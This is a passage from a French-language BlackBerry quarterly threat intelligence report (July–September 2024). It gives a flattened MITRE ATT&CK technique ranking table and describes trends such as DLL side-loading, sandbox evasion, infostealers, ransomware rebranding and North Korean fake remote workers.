7
=
Tâche/travail programmé(e)
T1053
Exécution, persistance, escalade des privilèges
19
Détournement de l'ordre de recherche des DLL
T1574.001
Persistance, escalade des privilèges, évasion des défenses
NA
Processus d'injection
T1055
Évasion de la défense, escalade des privilèges
3
Mascarade
T1036
Défense Evasion
10
Découverte du processus
T1057
Découverte
8
Créer ou modifier le processus du système
T1543
Persistance, escalade des privilèges
NA
Service Windows
T1543.003
Persistance, escalade des privilèges
NA
Exécution de l'AutoStart au démarrage ou à l'ouverture de session
T1547
Persistance, escalade des privilèges
14
Clés d'exécution du registre/dossier de démarrage
T1547.001
Persistance, escalade des privilèges
15
Découverte de fichiers et de répertoires
T1083
Découverte
9
Découverte du système à distance
T1018
Découverte
13
Interprète de commandes et de scripts
T1059
Exécution
NA
Dépréciation des défenses
T1562
Défense Evasion
17
ID de la technique
Flux d'exécution du détournement
T1574
Chargement latéral de DLL
T1574.002
Virtualisation/
Évasion du bac à sable
T1497
Découverte d'informations sur le système
T1082
Capture d'entrée
T1056
Découverte de logiciels
T1518
Découverte de logiciels de sécurité
T1518.001
Tâche/travail programmé(e)
T1053
Détournement de l'ordre de recherche des DLL
T1574.001
Processus d'injection
T1055
Mascarade
T1036
Découverte du processus
T1057
Créer ou modifier le processus du système
T1543
Service Windows
T1543.003
Exécution de l'AutoStart au démarrage ou à l'ouverture de session
T1547
Clés d'exécution du registre/dossier de démarrage
T1547.001
Découverte de fichiers et de répertoires
T1083
Découverte du système à distance
T1018
Interprète de commandes et de scripts
T1059
Dépréciation des défenses
T1562
Nom de la tactique
Flux d'exécution du détournement
Persistance, escalade des privilèges, évasion des défenses
Chargement latéral de DLL
Persistance, escalade des privilèges, évasion des défenses
Virtualisation/
Évasion du bac à sable
Défense, évasion, découverte
Découverte d'informations sur le système
Découverte
Capture d'entrée
Accès aux données d'identification, Collecte
Découverte de logiciels
Découverte
Découverte de logiciels de sécurité
Découverte
Tâche/travail programmé(e)
Exécution, persistance, escalade des privilèges
Détournement de l'ordre de recherche des DLL
Persistance, escalade des privilèges, évasion des défenses
Processus d'injection
Évasion de la défense, escalade des privilèges
Mascarade
Défense Evasion
Découverte du processus
Découverte
Créer ou modifier le processus du système
Persistance, escalade des privilèges
Service Windows
Persistance, escalade des privilèges
Exécution de l'AutoStart au démarrage ou à l'ouverture de session
Persistance, escalade des privilèges
Clés d'exécution du registre/dossier de démarrage
Persistance, escalade des privilèges
Découverte de fichiers et de répertoires
Découverte
Découverte du système à distance
Découverte
Interprète de commandes et de scripts
Exécution
Dépréciation des défenses
Défense Evasion
Dernier rapport
Flux d'exécution du détournement
1
Chargement latéral de DLL
2
Virtualisation/
Évasion du bac à sable
NA
Découverte d'informations sur le système
5
Capture d'entrée
4
Découverte de logiciels
6
Découverte de logiciels de sécurité
7
Tâche/travail programmé(e)
19
Détournement de l'ordre de recherche des DLL
NA
Processus d'injection
3
Mascarade
10
Découverte du processus
8
Créer ou modifier le processus du système
NA
Service Windows
NA
Exécution de l'AutoStart au démarrage ou à l'ouverture de session
14
Clés d'exécution du registre/dossier de démarrage
15
Découverte de fichiers et de répertoires
9
Découverte du système à distance
13
Interprète de commandes et de scripts
NA
Dépréciation des défenses
17
Changer
Flux d'exécution du détournement
=
Chargement latéral de DLL
=
Virtualisation/
Évasion du bac à sable
Découverte d'informations sur le système
Capture d'entrée
Découverte de logiciels
=
Découverte de logiciels de sécurité
=
Tâche/travail programmé(e)
Détournement de l'ordre de recherche des DLL
Processus d'injection
Mascarade
Découverte du processus
Créer ou modifier le processus du système
Service Windows
Exécution de l'AutoStart au démarrage ou à l'ouverture de session
Clés d'exécution du registre/dossier de démarrage
Découverte de fichiers et de répertoires
Découverte du système à distance
Interprète de commandes et de scripts
Dépréciation des défenses

Principales techniques adverses

Ce trimestre, le détournement du flux d'exécution (T1574) est apparu comme la technique la plus utilisée par les adversaires, sa sous-technique, le chargement latéral de DLL (T1574.002), arrivant en deuxième position. Ces méthodes impliquent que les attaquants manipulent la manière dont les systèmes d'exploitation exécutent les programmes, par exemple en chargeant latéralement des DLL, souvent pour contourner les systèmes de sécurité.

En outre, il convient de noter la progression de la technique Virtualization/Sandbox Evasion (T1497) dans le trio de tête. Cela suggère que les logiciels malveillants utilisés par les attaquants étaient fortement axés sur la lutte contre la détection, comme l'indiquent les binaires étudiés pour parvenir à ces conclusions.

Tactiques détectées

Au cours de ce trimestre, les trois principales tactiques sont l'évasion de la défense, l'escalade des privilèges et la persistance, comme le montre la figure 20.

 

Figure 20 : Tactiques de MITRE ATT&CK, juin - septembre 2024

Regarder vers l'avenir

Ce rapport de 90 jours, couvrant la période de juillet à septembre 2024, est conçu pour vous aider à rester informé et préparé aux menaces futures. Les groupes criminels les plus en vue, en particulier les opérateurs de ransomware, exploitent de nouvelles vulnérabilités et trouvent de la valeur dans les cibles, grandes et petites. Comme l'indique le rapport, les chercheurs de BlackBerry ont observé près de deux millions d'attaques stoppées au cours de ce seul trimestre. Compte tenu de ce niveau d'activité, il est essentiel de se tenir au courant des dernières nouvelles en matière de sécurité pour votre secteur et votre région.

Voici ce à quoi il faut s'attendre dans les mois à venir :

Les télécommunications en état de siège

Le secteur des télécommunications est apparu comme une cible privilégiée en 2024, comme en témoigne la faille d'AT&T qui a compromis les enregistrements d'appels et de textes sur l'ensemble de son réseau. À l'approche de 2025, nous nous attendons à ce que les attaquants ciblent de plus en plus l'infrastructure des télécommunications plutôt que les appareils individuels, ce qui leur permettra d'intercepter les communications à grande échelle. L'incident du site Salt Typhoon a montré comment des acteurs sophistiqués peuvent exploiter les vulnérabilités au niveau du réseau pour contourner les mesures de sécurité traditionnelles. Ce passage des logiciels malveillants spécifiques aux appareils aux attaques au niveau de l'infrastructure représente un défi critique, car les organisations doivent maintenant repenser leur approche de la sécurisation des communications sensibles sur les réseaux de télécommunications publics.

Les voleurs d'informations et les données volées sur les marchés noirs

Tout au long de l'année 2024, les voleurs d'informations ont occupé une place prépondérante dans nos rapports trimestriels sur les menaces. Les voleurs d'informations notoires ont souvent figuré en bonne place dans nos listes des principales menaces et sont apparus à de nombreuses reprises dans des attaques menées dans le monde entier. Selon Interpol, en 2023, les ventes de logs collectés auprès de voleurs d'informations sur le dark web ont augmenté de 40 %. En 2025, on s'attend à ce que cette augmentation se poursuive.

Patching et exploitation

L'exploitation de vulnérabilités non divulguées ou récemment découvertes par les acteurs de la menace, en particulier les gangs de ransomware, n'est pas un phénomène nouveau. Cependant, le rythme auquel ces vulnérabilités sont exploitées fait qu'il est de plus en plus difficile pour les professionnels de l'informatique de suivre le rythme. C'est particulièrement vrai dans notre monde hyperconnecté, avec sa myriade de processus, d'applications et de services. Les cybercriminels en sont conscients et cherchent activement à exploiter les faiblesses de l'infrastructure et de la sécurité informatiques d'une entreprise pour en tirer profit.

Au cours de cette période, plus de 50 % de tous les nouveaux CVE ont obtenu un score supérieur à 7,0. L'exploitation rapide des CVE et la militarisation des preuves de concept (PoC) devraient rester des défis importants pour l'industrie au cours de l'année à venir.

Rebranding et réémergence des ransomwares

Au cours des dernières décennies, les professionnels de l'application de la loi et de la cybersécurité ont joué au chat et à la souris avec les développeurs de ransomwares et leurs affiliés. Cependant, comme nous l'avons mentionné dans notre section sur le ransomware Lynx, la plupart des groupes sont des amalgames d'autres groupes, qui changent souvent de marque et utilisent d'autres codes de ransomware ou achètent des bases de codes malveillants à d'autres auteurs de logiciels malveillants. Cette tendance au changement de marque, à la réapparition et à la réutilisation des ransomwares va probablement se poursuivre, la barrière d'entrée dans l'espace cybercriminel ne cessant de s'abaisser.

Télétravailleurs nord-coréens et fausses identités

Des espions nord-coréens auraient tenté d'infiltrer des entreprises informatiques occidentales en se faisant passer pour des travailleurs à distance. Ces cybercriminels ont soigneusement élaboré de fausses identités, démontré les compétences requises pour réussir les entretiens d'embauche et les tests, et masqué leur géolocalisation pour éviter d'apparaître comme des Nord-Coréens. Dans certains cas, ils ont utilisé la technologie deepfake. Une fois embauchés, ils ont tenté d'exfiltrer des données internes et d'installer des utilitaires d'accès à distance.

Nous prévoyons que cette tendance à la falsification des identités pour infiltrer les organisations se poursuivra jusqu'en 2025. Il est probable que la Corée du Nord ait déployé un plus grand nombre de ces agents secrets qui n'ont pas encore été découverts et qu'ils feront évoluer leurs tactiques pour mieux échapper à la détection.

Visitez le blog BlackBerry pour vous tenir au courant de l'évolution des menaces et des défenses en matière de cybersécurité.

Avis de non-responsabilité

Les informations contenues dans le rapport BlackBerry Global Threat Intelligence Report sont fournies à titre d'information uniquement. BlackBerry ne garantit pas l'exactitude, l'exhaustivité et la fiabilité des déclarations ou des recherches de tiers auxquelles il est fait référence dans le présent rapport et n'en assume pas la responsabilité. L'analyse exprimée dans ce rapport reflète la compréhension actuelle des informations disponibles par nos analystes de recherche et peut être sujette à des changements au fur et à mesure que des informations supplémentaires sont portées à notre connaissance. Il incombe aux lecteurs de faire preuve de diligence raisonnable lorsqu'ils appliquent ces informations à leur vie privée et professionnelle. BlackBerry ne tolère aucune utilisation malveillante ou abusive des informations présentées dans ce rapport.